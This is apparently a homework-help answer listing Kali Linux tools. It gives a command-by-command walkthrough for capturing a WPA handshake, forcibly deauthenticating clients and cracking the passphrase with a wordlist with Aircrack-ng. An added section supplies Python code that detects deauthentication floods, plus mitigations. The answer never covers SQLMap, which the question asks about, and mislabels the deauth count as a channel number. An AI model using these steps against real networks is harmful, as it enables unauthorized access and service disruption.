In: Computer Science
Discuss applications on Kali Linux that can be used to conduct an attack. Provide information on a specific tool such as SQL Map and steps that an attacker could use to carry out a successful attack.
Kali Linux is one of the most recommended operating systems for ethical hacking and penetration testing. It is very feature-rich and comes with many built-in tools which will make your task easier when it comes to literally anything regarding digital forensics. Some of the tools are listed below:
1. Aircrack-ng - Aircrack-ng is one of the finest wireless password hacking tools for WEP/WAP/WPA2 cracking used worldwide.
2. THC Hydra - THC Hydra operates on the basis of brute-force attacks to crack virtually any remote authentication service. THC Hydra offers rapid dictionary attacks for 50+ protocols including FTP, HTTPS, Telnet, etc.
3. John the Ripper - John the Ripper is one of the most prominent cracking tools utilized for penetration testing.
4. Metasploit Framework - Metasploit Framework is an open-source framework which security experts and teams use to identify vulnerabilities as well as run security loopholes in the system in order to achieve better security.
5. Netcat - Netcat (nc) is a network utility tool which can use TCP/IP protocols to read and write data across network connections.
Aircrack-ng
Aircrack-ng is one of the finest wireless password hacking tools for WEP/WAP/WPA2 cracking used worldwide.
It operates by capturing packets in the network and analyzing them with the help of the recovered passwords. It also features a console interface. Additionally, Aircrack-ng utilizes the FMS (Fluhrer, Mantin, and Shamir) attack alongside some optimizations like the KoreK attacks and the PTW attack to accelerate the cracking process, which is faster than the WEP.
A detailed step-by-step approach to successfully cracking WPA/WPA2 Wi-Fi using Aircrack-ng on Kali Linux:
Step 1: Open a terminal. Type iwconfig to find the name of the wireless adapter connected to the PC. It is generally wlan0, or wlan1/wlan2 if the PC is connected to an external wireless card.
Step 2: Type airmon-ng check kill to avoid error messages in the next step (Step 3).
Step 3: To enable monitor mode on the wireless card, type airmon-ng start wlan0 (the interface of the wireless card). To monitor the WLAN, use wlan0mon in the terminal.
Step 4: Type airodump-ng wlan0mon to display all the APs in your surroundings and also the clients connected to those APs. It captures the packets in the air and will accumulate data from the wireless packets in the air.
Note: Do not close this terminal. It will be used to know whether the WPA handshake has been captured or not.
Step 5: Type airodump-ng -c 6 --bssid XX.XX.XX.XX.XX.XX -w /root/Desktop/captureddata wlan0mon
--bssid: the BSSID of the targeted victim, taken from the "airodump-ng wlan0mon" terminal screen
-c: the channel number of the targeted victim, taken from the "airodump-ng wlan0mon" terminal screen
-w: used for writing the captured data from the victim to the file path specified
interface: in this case wlan0mon
Step 6: The next step is to de-authenticate the clients connected to the Wi-Fi. Type
aireplay-ng --deauth 6 -a XX.XX.XX.XX.XX.XX wlan0mon
6 is the channel number
-a XX.XX.XX.XX.XX.XX is the router BSSID
wlan0mon is the monitor interface name
This command will disconnect all the clients from the access point.
Use -c <mac address of victim> to de-authenticate a particular target/victim.
After this, the client usually attempts to connect to the Wi-Fi again. At that time, we will capture the packets sent from the client. From this result, we will get the WPA handshake.
Step 7: This is the final step, where we actually start cracking the Wi-Fi with the captured packets. The command for this is
aircrack-ng -b XX.XX.XX.XX.XX.XX -w /root/Desktop/wordlist.txt /root/Desktop/captureddata.cap
-b XX.XX.XX.XX.XX.XX is the BSSID of the router
-w [path to wordlist] [path to write the captured data]
The wordlist is important. You can download a wordlist file available on the internet.
Now press Enter and Aircrack will initiate the cracking process.
Thanks!
Upvote if it helped!
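As an added defensive counterpart to the procedure above (example code written for this edit, not part of the original answer and not from the Aircrack-ng project): the de-authentication in Step 6 shows up on the air as a burst of 802.11 deauthentication frames, which is exactly what a wireless IDS looks for. The script below parses raw 802.11 management frames from a classic pcap (link type 105, or 127 with a radiotap header, both assumed) and raises one alert per BSSID whenever ten or more deauth/disassoc frames arrive within one second. The BSSID, client MAC, timestamps and reason codes in the embedded sample are constructed for the demonstration.

```python
"""Detect deauthentication bursts in a capture of raw 802.11 frames.

Added example (not from the original answer): parse management frames and
alert when one BSSID sees many deauth/disassoc frames in a short window.
"""
import struct
import sys
from collections import defaultdict

LINKTYPE_IEEE802_11 = 105           # raw 802.11 frames
LINKTYPE_IEEE802_11_RADIOTAP = 127  # 802.11 frames preceded by a radiotap header
SUBTYPE_DISASSOC, SUBTYPE_DEAUTH = 10, 12
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac(raw):
    return ":".join(f"{b:02x}" for b in raw)


def mac_bytes(text):
    return bytes.fromhex(text.replace(":", ""))


def parse_mgmt_frame(frame):
    """Return (subtype, addr1, addr2, bssid, reason) for a management frame, else None.

    Frame Control byte 0: bits 0-1 version, 2-3 type, 4-7 subtype. For deauth and
    disassoc frames a 2-byte reason code follows the 24-byte MAC header.
    """
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    if (fc0 >> 2) & 0x3 != 0:  # type 0 is management
        return None
    subtype = fc0 >> 4
    reason = None
    if subtype in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH) and len(frame) >= 26:
        reason = struct.unpack("<H", frame[24:26])[0]
    return subtype, mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22]), reason


def read_pcap(path):
    """Yield (timestamp, frame) from a classic pcap file, stripping radiotap headers."""
    with open(path, "rb") as fh:
        data = fh.read()
    endian = "<" if struct.unpack("<I", data[:4])[0] == 0xA1B2C3D4 else ">"
    linktype = struct.unpack(endian + "I", data[20:24])[0]
    if linktype not in (LINKTYPE_IEEE802_11, LINKTYPE_IEEE802_11_RADIOTAP):
        raise ValueError(f"unsupported link type {linktype}")
    off = 24
    while off + 16 <= len(data):
        sec, usec, incl, _ = struct.unpack(endian + "IIII", data[off:off + 16])
        frame = data[off + 16:off + 16 + incl]
        off += 16 + incl
        if linktype == LINKTYPE_IEEE802_11_RADIOTAP:
            frame = frame[struct.unpack("<H", frame[2:4])[0]:]  # radiotap it_len
        yield sec + usec / 1e6, frame


def detect_deauth_bursts(records, window=1.0, threshold=10):
    """Sliding-window count of deauth/disassoc frames per BSSID; one alert per burst."""
    per_bssid = defaultdict(list)
    for ts, frame in records:
        parsed = parse_mgmt_frame(frame)
        if parsed and parsed[0] in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH):
            per_bssid[parsed[3]].append((ts, parsed[1], parsed[4]))
    alerts = []
    for bssid, events in sorted(per_bssid.items()):
        events.sort()
        start, current = 0, None
        for end, (ts, dst, reason) in enumerate(events):
            while ts - events[start][0] > window:
                start += 1
            if end - start + 1 < threshold:
                current = None  # below threshold: any open burst is over
                continue
            if current is None:  # threshold crossed: open a new alert
                current = {"bssid": bssid, "start": events[start][0], "end": ts,
                           "frames": 0, "broadcast": 0, "reasons": set()}
                alerts.append(current)
                burst = events[start:end + 1]
            else:  # burst continues: extend the open alert by this frame
                burst = [(ts, dst, reason)]
            for _, d, r in burst:
                current["frames"] += 1
                current["broadcast"] += d == BROADCAST
                current["reasons"].add(r)
            current["end"] = ts
    return alerts


# Constructed sample traffic (all addresses and times made up): beacons, one
# client-initiated deauth, then a 12-frame broadcast deauth flood using the AP's address.
AP, CLIENT = "02:00:00:00:aa:01", "02:00:00:00:cc:01"


def make_frame(fc0, dst, src, bssid, reason=None):
    header = (bytes([fc0, 0]) + b"\x00\x00" + mac_bytes(dst) + mac_bytes(src)
              + mac_bytes(bssid) + b"\x00\x00")
    return header + (struct.pack("<H", reason) if reason is not None else b"")


def sample_records():
    t = 100.0
    recs = [(t + i * 0.1, make_frame(0x80, BROADCAST, AP, AP)) for i in range(5)]  # beacons
    recs.append((t + 0.3, make_frame(0xC0, AP, CLIENT, AP, reason=3)))  # client leaving normally
    recs += [(t + 2.0 + i * 0.02, make_frame(0xC0, BROADCAST, AP, AP, reason=7)) for i in range(12)]
    return recs


if __name__ == "__main__":
    records = read_pcap(sys.argv[1]) if len(sys.argv) > 1 else sample_records()
    for a in detect_deauth_bursts(records):
        kind = "broadcast" if a["broadcast"] else "targeted"
        print(f"{a['bssid']}: {a['frames']} {kind} deauth/disassoc frames in "
              f"{a['end'] - a['start']:.2f}s, reason codes {sorted(a['reasons'])}")
```

Run it without arguments to see the alert on the constructed sample, or pass a pcap written in monitor mode. The single deauth from the client is below the threshold and is ignored, while the flood is reported once with its frame count, whether it was broadcast or targeted, and the reason codes seen. On the mitigation side, 802.11w (Protected Management Frames) authenticates deauth and disassoc frames so that unauthenticated ones are discarded by clients, and a long, non-dictionary WPA2 passphrase is what makes the captured handshake resistant to the wordlist step.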